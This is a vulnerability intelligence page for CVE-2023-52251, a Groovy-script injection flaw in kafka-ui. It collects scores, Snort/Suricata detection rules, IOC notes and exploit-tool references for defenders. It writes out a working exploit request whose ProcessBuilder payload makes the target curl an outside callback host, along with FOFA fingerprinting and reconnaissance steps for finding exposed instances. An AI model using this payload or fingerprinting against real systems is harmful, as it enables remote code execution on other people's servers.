CVE-2023-52251
published 2024-01-25CVE-2023-52251: An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of…
PriorityP189high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.02%
99.7th percentile
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| provectus | ui | 0.4.0 – 0.7.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING↗
otherfilterQueryType=GROOVY_SCRIPT
otherfofa-query: icon_hash="-1477045616"
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/clusters/"; startswith; content:"/topics/"; within:50; content:"/messages?q|3d 22|"; within:50; content:"|28 29 26|filterQueryType|3d|GROOVY_SCRIPT"; distance:0; fast_pattern; reference:url,attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251; reference:cve,2023-52251; classtype:attempted-admin; sid:2050499; rev:2; metadata:affected_product Apache_Kafka, attack_target Web_Server, created_at 2024_01_25, cve CVE_2023_52251, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, updated_at 2024_03_08, reviewed_at 2024_10_03, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
- →Exploit requests are HTTP GET to the path /api/clusters/<name>/topics/<topic>/messages with the query parameter `q` containing a Groovy script payload (e.g. new ProcessBuilder(...).start()) and `filterQueryType=GROOVY_SCRIPT`. ↗
- →The Snort/ET rule keys on the URI pattern: starts with /api/clusters/, followed within 50 bytes by /topics/, then /messages?q= (hex 3d 22), then the byte sequence (hex 28 29 26) followed by filterQueryType=GROOVY_SCRIPT. SID 2050499.
- →Successful exploitation produces the string 'Assigning partitions' in the HTTP response body; this can be used as a confirmation matcher.
- →Attackers first enumerate /api/clusters to discover the cluster name, then /api/clusters/<name>/topics to discover a topic name, before launching the injection — monitor for this reconnaissance sequence.
- →Kafka UI instances can be fingerprinted via FOFA using the icon hash -1477045616 to identify exposed targets.
- ·The NVD description references the cluster name 'local' in the path, but the actual exploit dynamically enumerates the real cluster name from /api/clusters — detections hard-coded to 'local' may miss attacks against differently-named clusters. ↗
- ·The vulnerability affects Kafka UI versions 0.4.0 through 0.7.1 inclusive; version 0.7.2 and later are not affected. ↗
- ·The ET Snort rule (SID 2050499) requires SSL/TLS decryption (deployment SSLDecrypt) to fire on HTTPS-protected Kafka UI instances.
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)
suricata·2024-01-25·CVSS 8.8
CVE-2023-52251 [HIGH] ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)
ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Apache Kafka UI Unsanitized Groovy Script Filter Remote Code Execution Attempt (CVE-2023-52251)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/clusters/"; startswith; content:"/topics/"; within:50; content:"/messages?q|3d 22|"; within:50; content:"|28 29 26|filterQueryType|3d|GROOVY_SCRIPT"; distance:0; fast_pattern; reference:url,attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251; reference:cve,2023-52251; classtype:attempted-admin; sid:2050499; rev:2; metadata:affected_product Apache_Kafka, attack_target Web_Server, created_at 2024_01_25, cve CVE_2023_52251, deployment Per
Metasploit
Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
metasploit
Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.
A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter at the `topic` section.
Nuclei
Kafka UI 0.7.1 Command Injection
nuclei·CVSS 8.8
CVE-2023-52251 [HIGH] Kafka UI 0.7.1 Command Injection
Kafka UI 0.7.1 Command Injection
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
Template:
id: CVE-2023-52251
info:
name: Kafka UI 0.7.1 Command Injection
author: yhy0,iamnoooob
severity: high
description: |
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
impact: |
Authenticated attackers can inject and execute arbitrary commands via Groovy script injection in the filterQueryType parameter.
remediation: |
Upgrade Kafka UI to version 0.7.2 or later.
reference:
- http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command
No writeups or analysis indexed.
2024-01-25
Published
Exploited in the wild